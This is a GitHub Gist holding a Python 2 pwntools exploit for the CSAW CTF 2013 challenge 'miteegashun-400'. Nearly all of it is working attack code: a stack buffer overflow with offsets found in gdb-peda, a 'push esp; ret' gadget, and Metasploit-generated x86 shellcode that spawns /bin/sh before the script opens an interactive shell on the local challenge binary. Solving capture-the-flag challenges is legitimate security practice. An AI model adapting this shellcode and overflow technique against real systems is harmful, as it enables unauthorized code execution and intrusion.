Created
February 21, 2017 03:25
-
-
Save Tosainu/0a9faaffa8492f90b5da536413b03b65 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # CSAW CTF Qualification Round 2013: miteegashun-400 | |
| # http://shell-storm.org/repo/CTF/CSAW-2013/Exploitation/ | |
| from pwn import * | |
| # gdb-peda$ patto 0x4373416e | |
| # 1131626862 found at offset: 417 | |
| offset = 417 | |
| # gdb-peda$ patto HA%d | |
| # HA%d found at offset: 264 | |
| offset_shellcode = 264 + 4 + 4 | |
| # 0x0805c6b1: push esp ; ret ; (5 found) | |
| addr_push_esp_ret = 0x0805c6b1 | |
| # msf > use payload/linux/x86/exec | |
| # msf payload(exec) > generate -b '\x00' -t python -o CMD=/bin/sh | |
| shellcode = '' | |
| shellcode += '\xbb\x55\x28\xf8\x3d\xdd\xc5\xd9\x74\x24\xf4\x5d\x33' | |
| shellcode += '\xc9\xb1\x0b\x31\x5d\x15\x83\xed\xfc\x03\x5d\x11\xe2' | |
| shellcode += '\xa0\x42\xf3\x65\xd3\xc1\x65\xfe\xce\x86\xe0\x19\x78' | |
| shellcode += '\x66\x80\x8d\x78\x10\x49\x2c\x11\x8e\x1c\x53\xb3\xa6' | |
| shellcode += '\x17\x94\x33\x37\x07\xf6\x5a\x59\x78\x85\xf4\xa5\xd1' | |
| shellcode += '\x3a\x8d\x47\x10\x3c' | |
| r = process('./miteegashun') | |
| r.recvuntil('prove me wrong\n') | |
| payload = '' | |
| payload += '\x90' * offset_shellcode | |
| payload += shellcode | |
| payload += '\x90' * (offset - len(payload)) | |
| payload += p32(addr_push_esp_ret) | |
| r.sendline(payload) | |
| r.clean() | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment